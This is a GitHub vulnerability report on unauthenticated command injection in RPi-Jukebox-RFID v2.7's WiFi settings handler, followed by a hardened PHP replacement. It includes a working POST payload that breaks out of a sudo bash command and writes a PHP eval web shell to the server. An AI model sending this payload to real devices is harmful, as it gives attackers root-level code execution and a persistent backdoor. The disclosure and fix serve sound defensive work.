🐛 | RPi-Jukebox-RFID V2.7_RCE_6 #2401

Open

xjzzzxx opened this issue Jul 12, 2024 · 0 comments

Labels: bug, legacy_v2 (Issues, discussions and PRs related to Version 2.x), needs triage

Comments


xjzzzxx commented Jul 12, 2024

Version

v2.7.0

Branch

released

OS

ubuntu 22

Pi model

unknown

Hardware

No response

What happened?

Hello,

I would like to report an RCE vulnerability in RPi-Jukebox-RFID v2.7 (no permissions required).

Analysis

The path of the vulnerability: htdocs\inc.setWifi.php

```php
# htdocs\inc.setWifi.php
if(isset($_POST["submitWifi"]) && $_POST["submitWifi"] == "submit") {	// Line 8(Check point)
    $exec  = "bash -e <<'END'\n";
    $exec .= "source ".$conf['scripts_abs']."/helperscripts/inc.networkHelper.sh\n";
    $exec .= "clear_wireless_networks\n";
    $tempPOST = $_POST;			// Line 14 (Source)
    $_POST=array(); //clear
    foreach ( $tempPOST as $post_key => $post_value ) {
        unset($temp_ssid);
        unset($temp_pass);
        unset($temp_prio);
        if ( substr(trim($post_key), 0, 9) == "WIFIssid_" ) {		// Line 20(check for temp_ssid)
            $temp_ssid = trim($post_value);
            $post_key = "WIFIpass_".substr(trim($post_key), 9); // Line  22(check for temp_pass)
            $post_value = $tempPOST[$post_key];
            $temp_pass = trim($post_value);
            $post_key = "WIFIprio_".substr(trim($post_key), 9); // Line  25(check for temp_prio)
            $post_value = $tempPOST[$post_key];
            $temp_prio = trim($post_value);
            if (isset($temp_ssid) && $temp_ssid != "" && isset($temp_pass) && strlen($temp_pass) >= 8) {	// Line 28
                if(!isset($temp_prio) || !is_numeric($temp_prio)) {
                    $temp_prio = 0;
                }
                $exec .= "add_wireless_network wlan0 ".$temp_ssid." ".$temp_pass." ".$temp_prio."\n";
            }
        }
    }

    $exec .= "END\n";
    exec("sudo bash -c '". $exec . "'");	// Line 38(Sink)
}
```

Source from Line 14 ($_POST).

And then there is a check point (Line 8), which we should set $_POST['submitWifi'] = submit to bypass.

Finally, the sink point executes a complex concatenated command (Line 38).

Let's briefly analyze this concatenated command:

```sh
sudo bash -c 'bash -e <<'END'
source ".$conf['scripts_abs']."/helperscripts/inc.networkHelper.sh
clear_wireless_networks
add_wireless_network wlan0 $temp_ssid $temp_pass $temp_prio
END
'
```

We have three controllable variables ($temp_ssid, $temp_pass, $temp_prio), but they need to meet the corresponding checks (Line 20, Line 22, Line 25 and Line 28). It can be seen that the condition we need to meet is to use KEY values with the prefixes WIFIssid_, WIFIpass_, and WIFIprio_, and strlen($temp_pass) >= 8.

In addition, since we are using bash -e mode, we must ensure that all commands before the controllable points can be executed correctly. That is, we need to find the correct value for $conf['scripts_abs'], which can be found in htdocs/settings.php:

```php
# htdocs/settings.php
include("inc.header.php"); // Line 3 (init $conf['scripts_abs'])
...
include("inc.setWifi.php"); // Line 191
```

So we need to POST to htdocs/settings.php.

PoC

POST /htdocs/settings.php

Data:

submitWifi=submit&WIFIssid_123=+%7c%7c+echo+%22%3c%3fphp+%40eval(%5c%5c%5c%24_POST%5b%5c%22shell6%5c%22%5d)%3b+%3f%3e%22+%3e+.%2fshell6.php+&WIFIpass_123=%7c%7c+echo+%221%22+%7c%7c+&WIFIprio_123=1

Here is the version without url encoding for ease of understanding:

submitWifi=submit&WIFIssid_123= || echo "<?php @eval(\\\$_POST[\"shell6\"]); ?>" > ./shell6.php &WIFIpass_123=|| echo "1" || &WIFIprio_123=1

The concatenated command:

```sh
sudo bash -c 'bash -e <<'END'
source /www/admin/cms.jukebox27.com_80/wwwroot/scripts/helperscripts/inc.networkHelper.sh
clear_wireless_networks
add_wireless_network wlan0 || echo "<?php @eval(\\\$_POST[\"shell6\"]); ?>" > ./shell6.php || echo "1" || 1
END
'
```

Manual verification

(Three screenshots, 21, 22 and 23, were attached here; they are not reproduced in this text.)

Logs

No response

Configuration

No response

More info

No response

@xjzzzxx xjzzzxx added bug legacy_v2 Issues, discussions and PRs related to Version 2.x needs triage labels Jul 12, 2024
@xjzzzxx xjzzzxx changed the title 🐛 | RPi-Jukebox-RFID V2.7_RCE_5 🐛 | RPi-Jukebox-RFID V2.7_RCE_6 Jul 12, 2024
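As an added example (not code from the RPi-Jukebox-RFID project), a hardened replacement for the inc.setWifi.php handler quoted in the report: each field is validated against an allowlist, every value is quoted with escapeshellarg(), and the generated script is handed to `sudo bash -e` on stdin through proc_open() instead of being nested inside `bash -c '...'`, which is the quoting layer the PoC breaks out of. Assumptions: PHP 7.4 or later, the SSID character allowlist chosen here, and $conf['scripts_abs'] being initialised by inc.header.php as the report describes.

```php
<?php
// Added example (not the project's code): hardened replacement for the inc.setWifi.php handler.
// Assumes PHP >= 7.4, the same POST field names, and $conf['scripts_abs'] set by inc.header.php.
function valid_ssid(string $s): bool {
    // 802.11 SSIDs are 1-32 bytes; this allowlist (an assumption) also excludes shell metacharacters.
    return preg_match('/^[A-Za-z0-9 ._-]{1,32}$/', $s) === 1;
}
function valid_psk(string $p): bool {
    // WPA2-PSK passphrases are 8-63 printable ASCII characters; quoting below handles the rest.
    return preg_match('/^[\x20-\x7e]{8,63}$/', $p) === 1;
}
function build_wifi_script(array $post, string $scripts_abs): ?string {
    // Returns the script to feed to `sudo bash -e` on stdin, or null if any field is rejected.
    $lines = ["source " . escapeshellarg($scripts_abs . "/helperscripts/inc.networkHelper.sh"),
              "clear_wireless_networks"];
    foreach ($post as $key => $ssid) {
        if (!is_string($key) || strncmp($key, "WIFIssid_", 9) !== 0) continue;
        $idx  = substr($key, 9);
        $pass = $post["WIFIpass_" . $idx] ?? "";
        $prio = $post["WIFIprio_" . $idx] ?? "0";
        // is_string() rejects array-valued fields such as WIFIssid_1[]; the regexes reject everything else
        if (!is_string($ssid) || !is_string($pass) || !valid_ssid($ssid) || !valid_psk($pass)) {
            return null;   // reject the whole request instead of silently skipping the entry
        }
        if (!is_string($prio) || preg_match('/^\d{1,3}$/', $prio) !== 1) {
            $prio = "0";   // is_numeric() would also accept "1e3", "-1" and " 5"
        }
        // escapeshellarg() single-quotes each value; with no outer bash -c '...' layer, nothing to break out of
        $lines[] = "add_wireless_network wlan0 " . escapeshellarg($ssid) . " "
                 . escapeshellarg($pass) . " " . $prio;
    }
    return implode("\n", $lines) . "\n";
}
function run_wifi_script(string $script): int {
    // argv-array form of proc_open() starts sudo directly; no shell parses the script as a command line.
    $spec = [0 => ["pipe", "r"], 1 => ["pipe", "w"], 2 => ["pipe", "w"]];
    $proc = proc_open(["sudo", "bash", "-e"], $spec, $pipes);
    if (!is_resource($proc)) return 1;
    fwrite($pipes[0], $script);
    fclose($pipes[0]);
    stream_get_contents($pipes[1]); stream_get_contents($pipes[2]);
    fclose($pipes[1]); fclose($pipes[2]);
    return proc_close($proc);
}
if (isset($_POST["submitWifi"]) && $_POST["submitWifi"] === "submit") {
    $script = build_wifi_script($_POST, $conf['scripts_abs']);
    if ($script === null) { http_response_code(400); exit("invalid WiFi settings"); }
    run_wifi_script($script);
}
```

With this structure the PoC values above fail valid_ssid() and the request is rejected with HTTP 400 before any process is started; even a value that passed the allowlist would reach add_wireless_network as a single quoted argument.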